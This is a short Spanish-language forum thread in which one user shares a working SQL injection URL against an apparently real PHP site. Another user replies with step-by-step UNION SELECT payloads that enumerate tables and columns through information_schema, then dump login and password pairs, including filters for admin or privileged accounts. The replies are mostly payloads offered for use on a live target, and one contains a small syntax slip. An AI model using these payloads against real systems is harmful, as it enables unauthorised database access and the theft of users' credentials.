Muy buenas tardes, estoy haciendo pruebas de SQLi y esta ha sido la primera que me ha salido bien, hasta el momento ;-).
Pues el problema es que no encuentro ninguna tabla llamada "users,usuarios" o algo y ahí me quedoo entrabancado dejo la inyección:
(http://www.xxxx.xxx/info_page.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+1,1--) A partir de ahí que tengo que hacer para poder encontrar el usuario/administrador, un saludo y muchas gracias.
Sacas todas las tablas, y buscas la de los usuarios:
union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+
A esa tabla la llamaremos 'usuarios'. Ahora sacas los campos de la tabla usuarios:
union+select+1,group_concat(column_name),3,4,5+from+information_schema.column+where+table_name='usuarios'+--+
Entre otros campos, tiene el campo 'login' y 'pwd', por ejemplo:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+--+
Sacará los usuarios. Si en alguno de los pasos no salen todos, es porque no caben, puedes usar 'limit' y sacarlos uno a uno, o usar este truco (http://"http://ponymagic.diosdelared.com/index.php?coment=3956").
Si solo quieres el del admin, puedes añadir una cláusula where o ver si hay algún campo en la tabla que represente los privilegios del usuario.
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+login+like+'%admin%'--+
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+priv=1+--+
No seas malo...
Muchas gracias :D
Tranquilo que no haré nada solo estoy practicando hehe.